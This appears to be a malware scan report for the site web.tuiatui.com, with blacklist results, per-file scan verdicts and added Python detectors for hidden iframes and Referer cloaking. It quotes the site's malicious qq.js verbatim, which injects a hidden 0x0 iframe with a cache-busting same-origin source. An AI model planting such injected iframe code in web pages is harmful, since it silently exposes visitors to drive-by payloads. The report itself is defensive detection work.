Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web.tuiatui.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web.tuiatui.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Two lists, two answers: Google Safe Browsing has no entry while Yandex flags the site. Blacklists lag each other's crawls, so absence from one list is not evidence that a site is clean; the per-file scan results below are what settle it.
Scanned pages/files
Request | Server response | Status |
http://web.tuiatui.com/content/ | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:21:58 GMT Server: IIS Content-Length: 7561 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=ej4fgrvk2mdnd5hr2s4dvsfq; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/ | 200 OK Content-Length: 131830 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: chenfatan.tuiatui.com. The hit is a shop link in the product-listing markup; chenfatan.tuiatui.com is a sibling subdomain of the scanned host (another shop on the same platform), not a third-party site. Excerpt, with the mis-encoded Chinese product text omitted: ...[47006 bytes skipped]... <li class="show-item"><a style="color: #ff5500;" href="http://chenfatan.tuiatui.com/shop/" >[garbled text]</a></li> ...[108770 bytes skipped]...
http://www.tuiatui.cn/index.php/Tj/index?jsuid=134 | 200 OK Content-Length: 5014 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/content/js/jquery-top.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:04 GMT Server: IIS Content-Length: 7592 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=elxrf5kn4mbx4lw0ssepafs2; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/test404page.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:05 GMT Server: IIS Content-Length: 7579 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=pq0qizthgahh30ead0edruvp; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/content/inputSuggest_0.1.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:06 GMT Server: IIS Content-Length: 7599 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=bzuyoecklz5iualkz1gkfmrd; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/WebResource.axd?d=9AHjoez9BzNKZrgEUhFr30DL5EVNYXIgMAzox9N_jDSI_azkloFZBQB0zjW44EH5xPZsyPxN1DdWaEL0ugPHI-VLpt71HoRjNy-XKAe8PO41&t=634773918900000000 | 200 OK Content-Length: 22346 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=FOuwedjHdZwmdycCJ8okv848dCL630rXwCkIoGO0L2lsP5HMd-r2MkNNjAq8UZ8FuJ89bOrVckmpawbGrkNVpPQcWakWMX3gFsTfrfP8QmaRIBc_NhCHKwDlH3BYGubhFUvqqpz9cLXYYZfys__yNV_SwPxKcpWMjoAWmsA9LfI1&t=2f7a99f5 | 200 OK Content-Length: 26951 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=fFnB4J-GM-_Szd2FfELfzU51ZsX6036lIEZnUL2mS_69pMWRb2eHHAkf4T8QlRlOo604aOCHmcFixq1XREl_VOimjcORQh-tPIBRRMdWYZ_KwfASW6Ngk43kHjQQpEeJSAaLQAJEpIn58U0zIy2_nxiUK1YMCuAE5vGOTBJvMRMIKf20OnHYLQowaORncPbr0&t=6119e399 | 200 OK Content-Length: 300883 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=1iYv556PDjTj9kalH-_ZPh_ENSV-GyolY9eLiyWmIW7J8SBWBzwXslB-h7gW0pzgXORZIhXip3qTzQ9TP-PO2GZfHB8UnsGUXiOeX108hrMOFhCZb65SD_mlp7aqF83S9qAtdySrH9TtzYKKWaHsmkrex-bBVgIy6nt9NuqdC6TdthxYmKRXl6UsjlVaYQ4_0&t=6119e399 | 200 OK Content-Length: 101392 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/content/../imgd/swfobject.js | 200 OK Content-Length: 10223 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/qq.js | 200 OK Content-Length: 179 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus reports (see below):
var randomnumber=Math.floor(Math.random()*100000);
document.write('<iframe src="http://'+location.hostname+'/dy/get.aspx?random='+randomnumber+'" width=0 height=0></iframe>');
Antivirus report: Hidden iFrame found. size: 0x0 src: http://'+location.hostname+'/dy/get.aspx?random='+randomnumber+'
The frame's src is assembled at run time from the hostname of the page that includes the script, so the 0x0 frame loads /dy/get.aspx from the same origin (here web.tuiatui.com) rather than from a foreign domain a hostname blacklist would catch, and the random query string stops the payload from being cached between visits.
http://api.pop800.com/800.js?n=105727&s=06-14&p=r&l=cn | 200 OK Content-Length: 41055 Content-Type: text/html | clean |
Note on the "clean" rows: /content/js/jquery-top.js, /test404page.js and /content/inputSuggest_0.1.js are .js paths answered 200 OK with Content-Type: text/html, a body of about 7.5 KB and a freshly issued ASP.NET_SessionId, the same shape as the /content/ page. That is a soft 404: the server returns its HTML error page with status 200 instead of 404, so for those rows the scanner analysed an error page rather than the script the front page references (test404page.js appears to be a probe for a path that should not exist, which is how the soft-404 signature is established). X-AspNet-Version: 0 and X-Powered-By: WAF/2.0 are consistent with a WAF rewriting the server's version headers. The pop800 row also serves a .js URL as text/html; with a 41 KB body that is more likely a mislabelled content type than an error page, but it is a third-party include worth checking separately.
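The qq.js row is the one finding that matters, and it shows why it slipped past the host-level blacklists: the frame's src is concatenated from location.hostname, so the payload URL /dy/get.aspx is same-origin, and the random query string defeats caching. Below is an added Python example, written for this page and not part of the scanner or of the site's code, that performs the two checks the table implies: a static hidden-iframe detector run over a constructed copy of the qq.js body quoted above (with a constructed benign embed for contrast), and the heuristic that flags a script URL answered with text/html, as in the jquery-top.js and test404page.js rows. The Math.random()/location.hostname heuristics, the 1x1 size threshold and the player.example URL are this example's own assumptions.

```python
import re

# Constructed copy of the qq.js body quoted in the scan table (179 bytes in the scan); nothing is fetched.
QQ_JS = (
    "var randomnumber=Math.floor(Math.random()*100000);"
    "document.write('<iframe src=\"http://'+location.hostname"
    "+'/dy/get.aspx?random='+randomnumber+'\" width=0 height=0></iframe>');"
)

# Constructed benign contrast sample: a visible embed with a fixed origin (player.example is a placeholder).
BENIGN_JS = (
    "document.write('<iframe src=\"https://player.example/v/123\" "
    "width=640 height=360></iframe>');"
)

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SCRIPT_LIKE = {"js", "css", "swf", "png", "gif", "jpg", "ico"}


def _dimension(value):
    """Leading integer of '0', '0px', '100%'; None when the attribute is absent or non-numeric."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def find_hidden_iframes(js_source):
    """One finding per <iframe> in js_source that is sized 1x1 or smaller or hidden by inline CSS."""
    findings = []
    for tag in IFRAME_TAG.finditer(js_source):
        attrs = {}
        for name, dq, sq, bare in ATTR.findall(tag.group(1)):
            attrs[name.lower()] = dq if dq else sq if sq else bare
        width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        tiny = width is not None and height is not None and width <= 1 and height <= 1
        css_hidden = bool(HIDDEN_STYLE.search(attrs.get("style", "")))
        if not (tiny or css_hidden):
            continue
        src = attrs.get("src", "")
        findings.append({
            "src": src,
            "width": width,
            "height": height,
            # src built from the visiting page's own hostname: the payload URL is same-origin,
            # so a blacklist of foreign hostnames extracted from the script never fires (assumed heuristic)
            "same_origin_dynamic": "location.hostname" in src or "location.host" in src,
            # Math.random() feeding the query string defeats caching between visits (assumed heuristic)
            "cache_buster": "Math.random" in js_source and "random" in src,
            "via_document_write": "document.write" in js_source,
        })
    return findings


def html_for_script_url(url, content_type):
    """True when a script/asset URL is answered with an HTML body: a soft 404 or a mislabelled type."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    media_type = content_type.split(";", 1)[0].strip().lower()
    return ext in SCRIPT_LIKE and media_type == "text/html"


if __name__ == "__main__":
    for finding in find_hidden_iframes(QQ_JS):
        print(finding)
    print(html_for_script_url("http://web.tuiatui.com/test404page.js", "text/html; charset=utf-8"))
```

The detector looks only at the tag attributes written into the page, which is the common shape of injected frames and is enough for qq.js; an iframe hidden by an external stylesheet or created with createElement rather than document.write needs a DOM-level check in a headless browser instead.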
Malicious Redirects
First query (normal visit, no Referer header):
GET / HTTP/1.1
Host: web.tuiatui.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 15 Apr 2014 18:21:59 GMT
Server: IIS
Content-Length: 131830
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=fe5irzzfew2045yhcee4a032; path=/; HttpOnly
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: dayfirst=advid=2642; expires=Tue, 15-Apr-2014 23:22:00 GMT; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
X-AspNet-Version: 0
X-Powered-By: WAF/2.0
...131830 bytes of data.
Second query (visit from a search engine, simulated by adding a Google search Referer header):
GET / HTTP/1.1
Host: web.tuiatui.com
Referer: http://www.google.com/search?q=web.tuiatui.com
Result:
The response is the same as for the first query (200 OK, same Content-Length, no redirecting content), so no Referer-conditional redirect was found.
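The two-request check above looks for cloaking: a redirect served only to visitors who arrive from a search engine, so that the site owner and ordinary revisits never see it. As an added example, not part of the original report or of the scanner, the Python below compares a normal response with a Referer-carrying one and reports every redirect destination (HTTP Location on a 3xx, <meta http-equiv=refresh>, and the usual JavaScript location assignments) that appears only in the referred response. NORMAL is a constructed stand-in for the 200 OK front page recorded above; CLOAKED and landing.example are hypothetical, constructed to show what the check reports when cloaking is present.

```python
import re
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    headers: dict  # header names in any case
    body: str


# <meta http-equiv="refresh" content="0;url=http://...">
META_REFRESH = re.compile(
    r"""<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']?\s*\d+\s*;\s*url\s*=\s*([^"'>\s]+)""",
    re.I,
)
# location.href = "..." / window.location = '...' / top.location.replace("...")
JS_REDIRECT = re.compile(
    r"""(?:window\.|top\.|self\.|parent\.|document\.)?location(?:\.href|\.replace\s*\(|\.assign\s*\()?\s*=?\s*["']([^"']+)["']""",
    re.I,
)


def redirect_targets(resp):
    """Every destination a browser would be sent to by this response, tagged by mechanism."""
    targets = set()
    location = {k.lower(): v for k, v in resp.headers.items()}.get("location")
    if 300 <= resp.status < 400 and location:
        targets.add(("http", location))
    for m in META_REFRESH.finditer(resp.body):
        targets.add(("meta", m.group(1)))
    for m in JS_REDIRECT.finditer(resp.body):
        targets.add(("js", m.group(1)))
    return targets


def conditional_redirects(normal, referred):
    """Redirects present only in the search-engine-referred response: the cloaking signal."""
    return redirect_targets(referred) - redirect_targets(normal)


# Constructed stand-in for the 200 OK front page recorded above (headers abbreviated, body sketched).
NORMAL = Response(
    200,
    {"Content-Type": "text/html; charset=utf-8", "Server": "IIS", "X-Powered-By": "WAF/2.0"},
    '<html><head><script src="qq.js"></script></head><body>...</body></html>',
)

# Hypothetical, constructed cloaked answer to the same GET / sent with
# Referer: http://www.google.com/search?q=web.tuiatui.com. landing.example is a placeholder.
CLOAKED = Response(
    302,
    {"Location": "http://landing.example/offer", "Content-Type": "text/html"},
    '<html><head><meta http-equiv="refresh" content="0;url=http://landing.example/offer">'
    '<script>window.location.href="http://landing.example/offer";</script></head></html>',
)

if __name__ == "__main__":
    for kind, url in sorted(conditional_redirects(NORMAL, CLOAKED)):
        print(f"referer-only redirect via {kind}: {url}")
```

The scan varied only the Referer. Cloaking kits commonly key on the User-Agent (search-engine crawler versus browser) and on client IP ranges as well, so a clean result from this single variation does not rule cloaking out; repeat the comparison with a crawler User-Agent and from more than one network.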